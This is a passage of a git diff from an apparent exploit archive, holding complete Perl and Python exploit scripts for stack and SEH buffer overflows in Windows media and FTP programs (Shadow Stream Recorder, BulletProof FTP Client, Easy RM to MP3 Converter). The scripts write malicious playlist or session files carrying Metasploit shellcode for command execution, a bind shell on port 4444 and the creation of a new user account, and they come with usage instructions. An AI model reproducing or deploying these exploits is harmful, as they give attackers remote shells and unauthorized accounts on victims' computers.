+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $ex="http://"."A" x 26117;
+my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
+      # "\x5D\x38\x82\x7C";
+my $nop="\x90" x 20;
+open(MYFILE,'>>Mini-stream-Ripper.m3u');
+print MYFILE $Header.$ex.$ret.$nop.$shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8420.py b/platforms/windows/local/8420.py
index c22e95fb7..6603c4c64 100755
--- a/platforms/windows/local/8420.py
+++ b/platforms/windows/local/8420.py
@@ -1,52 +1,52 @@
-#!/usr/bin/python
-#[*] Bug : 	    BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
-#[*] Credits :      Stack
-#[*] Tested on :    Xp sp2 (fr)
-#[*] Exploited by : His0k4
-#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
-#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
-#[*] translate by Cyb3r-1st: esse7 embe7 embou :D
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode=(
-"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
-"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
-"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
-"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
-"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb"
-"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9"
-"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06"
-"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5"
-"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89"
-"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d")
-
-header1=(
-"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74"
-"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74"
-"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e"
-"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20"
-"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
-"\x79\x2e\x0d\x0a")
-
-exploit =  "passwords.hotmail.com"
-exploit += "\x90"*68
-exploit += "\x74\x06\x90\x90" #oplaa!
-exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
-exploit += shellcode
-
-header2=(
-"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
-"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
-"\x2f\x0d\x0a")
-
-vuln = header1 + exploit + header2
-
-try:
-    out_file = open("sploit.bps",'w')
-    out_file.write(vuln)
-    out_file.close()
-    print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
-except:
-    print "Error!"
-
-# milw0rm.com [2009-04-13]
+#!/usr/bin/python
+#[*] Bug : 	    BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
+#[*] Credits :      Stack
+#[*] Tested on :    Xp sp2 (fr)
+#[*] Exploited by : His0k4
+#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
+#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
+#[*] translate by Cyb3r-1st: esse7 embe7 embou :D
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode=(
+"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
+"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
+"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
+"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
+"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb"
+"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9"
+"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06"
+"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5"
+"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89"
+"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d")
+
+header1=(
+"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74"
+"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74"
+"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e"
+"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20"
+"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
+"\x79\x2e\x0d\x0a")
+
+exploit =  "passwords.hotmail.com"
+exploit += "\x90"*68
+exploit += "\x74\x06\x90\x90" #oplaa!
+exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
+exploit += shellcode
+
+header2=(
+"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
+"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
+"\x2f\x0d\x0a")
+
+vuln = header1 + exploit + header2
+
+try:
+    out_file = open("sploit.bps",'w')
+    out_file.write(vuln)
+    out_file.close()
+    print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
+except:
+    print "Error!"
+
+# milw0rm.com [2009-04-13]
diff --git a/platforms/windows/local/8426.pl b/platforms/windows/local/8426.pl
index e2d5b1c59..f75f62fad 100755
--- a/platforms/windows/local/8426.pl
+++ b/platforms/windows/local/8426.pl
@@ -1,110 +1,110 @@
-#!/usr/bin/perl
-# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
-# By AlpHaNiX [NullArea.Net]
-# alpha[at]hacker.bz
-# Made in Tunisia
-###########
-# program : Shadow Stream Recorder
-# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
-# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
-##########
-# Exploit In Action :
-#[!] usage :
-#    ./sploit.pl bindshell
-#    ./sploit.pl cmdexec
-#    ./sploit.pl adduser
-##########
-# C:\>sploit.pl bindshell
-#[!] Done
-# C:\>nc localhost 4444
-# Console - Windows Trust 3.0 (Service Pack 3: v5512)
-#
-#(C) 1985-2008 Microsoft Corp.
-# Everything Tested Under Windows XP SP3 FR
-# After Creating The File just open the program & drag and drop m3u evil file ! :)
-
-
-
-sub help {print "[!] usage :   \n    ./sploit.pl bindshell \n    ./sploit.pl cmdexec \n    ./sploit.pl adduser \n " ;exit();}
-
-&help
-unless $ARGV[0];
-
-
-my $sploit = $ARGV[0];
-my $junk   = "http://"."A" x 26117;
-my $ret    = "\x63\x46\x92\x7C";
-my $nope   = "\x90" x 30;
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
-my $calc_shellcode =
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
-"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
-"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
-"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
-"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
-"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
-"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
-"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
-"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
-"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
-"\xac\x2c\xc9\x40" ;
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-my $bindshell =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69".
-"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8".
-"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c".
-"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e".
-"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f".
-"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec".
-"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c".
-"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57".
-"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7".
-"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05".
-"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54".
-"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6".
-"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f".
-"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e".
-"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50".
-"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57".
-"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a".
-"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8".
-"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56".
-"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7".
-"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58".
-"\x3a\xba\xed\xf8\xb9\x45\x3b\x07";
-
-
-# win32_adduser -  PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
-my $add_user =
-"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca".
-"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f".
-"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43".
-"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07".
-"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c".
-"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e".
-"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81".
-"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62".
-"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e".
-"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f".
-"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66".
-"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25".
-"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66".
-"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b".
-"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
-"\x8e\x31\xb1\x0a";
-
-if ($sploit eq 'bindshell')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}
-
-elsif ($sploit eq 'cmdexec')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}
-
-elsif ($sploit eq 'adduser')
-{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}
-
-else {&help}
-
-# milw0rm.com [2009-04-14]
+#!/usr/bin/perl
+# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
+# By AlpHaNiX [NullArea.Net]
+# alpha[at]hacker.bz
+# Made in Tunisia
+###########
+# program : Shadow Stream Recorder
+# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
+# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
+##########
+# Exploit In Action :
+#[!] usage :
+#    ./sploit.pl bindshell
+#    ./sploit.pl cmdexec
+#    ./sploit.pl adduser
+##########
+# C:\>sploit.pl bindshell
+#[!] Done
+# C:\>nc localhost 4444
+# Console - Windows Trust 3.0 (Service Pack 3: v5512)
+#
+#(C) 1985-2008 Microsoft Corp.
+# Everything Tested Under Windows XP SP3 FR
+# After Creating The File just open the program & drag and drop m3u evil file ! :)
+
+
+
+sub help {print "[!] usage :   \n    ./sploit.pl bindshell \n    ./sploit.pl cmdexec \n    ./sploit.pl adduser \n " ;exit();}
+
+&help
+unless $ARGV[0];
+
+
+my $sploit = $ARGV[0];
+my $junk   = "http://"."A" x 26117;
+my $ret    = "\x63\x46\x92\x7C";
+my $nope   = "\x90" x 30;
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
+my $calc_shellcode =
+"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
+"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
+"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
+"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
+"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
+"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
+"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
+"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
+"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
+"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
+"\xac\x2c\xc9\x40" ;
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+my $bindshell =
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69".
+"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8".
+"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c".
+"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e".
+"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f".
+"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec".
+"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c".
+"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57".
+"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7".
+"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05".
+"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54".
+"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6".
+"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f".
+"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e".
+"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50".
+"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57".
+"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a".
+"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8".
+"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56".
+"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7".
+"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58".
+"\x3a\xba\xed\xf8\xb9\x45\x3b\x07";
+
+
+# win32_adduser -  PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
+my $add_user =
+"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca".
+"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f".
+"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43".
+"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07".
+"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c".
+"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e".
+"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81".
+"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62".
+"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e".
+"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f".
+"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66".
+"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25".
+"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66".
+"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b".
+"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
+"\x8e\x31\xb1\x0a";
+
+if ($sploit eq 'bindshell')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}
+
+elsif ($sploit eq 'cmdexec')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}
+
+elsif ($sploit eq 'adduser')
+{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}
+
+else {&help}
+
+# milw0rm.com [2009-04-14]
diff --git a/platforms/windows/local/8427.py b/platforms/windows/local/8427.py
index 432f02def..994aefc0e 100755
--- a/platforms/windows/local/8427.py
+++ b/platforms/windows/local/8427.py
@@ -1,50 +1,50 @@
-#!/usr/bin/python
-# Easy RM to MP3 Converter Universall Stack Overflow Exploit
-# By Stack
-# hihihi
-# StaKer : Only Fabri Fibra :d
-header = (
-"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D"
-"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45"
-"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46"
-"\x69\x6C\x65\x31\x3D")
-junk = "\x41"*1244
-eip = "\xDB\x70\xBB\x01" #  Universall Adress
- # Abouts addres
- # Executable modules, item 5
- # Base=01A20000
- # Size=0049D000 (4837376.)
- # Entry=01B835B1 MSRMCu_3.<ModuleEntryPoint>
- # Name=MSRMCu_3
- # Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll
-
-nops = "\x90" * 20
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
-"\x4e\x46\x43\x36\x42\x50\x5a")
-ex = header+junk+eip+nops+shellcode
-file=open("Exploit.pls","w")
-file.write(ex)
-file.close()
-
-# milw0rm.com [2009-04-14]
+#!/usr/bin/python
+# Easy RM to MP3 Converter Universall Stack Overflow Exploit
+# By Stack
+# hihihi
+# StaKer : Only Fabri Fibra :d
+header = (
+"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D"
+"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45"
+"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46"
+"\x69\x6C\x65\x31\x3D")
+junk = "\x41"*1244
+eip = "\xDB\x70\xBB\x01" #  Universall Adress
+ # Abouts addres
+ # Executable modules, item 5
+ # Base=01A20000
+ # Size=0049D000 (4837376.)
+ # Entry=01B835B1 MSRMCu_3.<ModuleEntryPoint>
+ # Name=MSRMCu_3
+ # Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll
+
+nops = "\x90" * 20
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
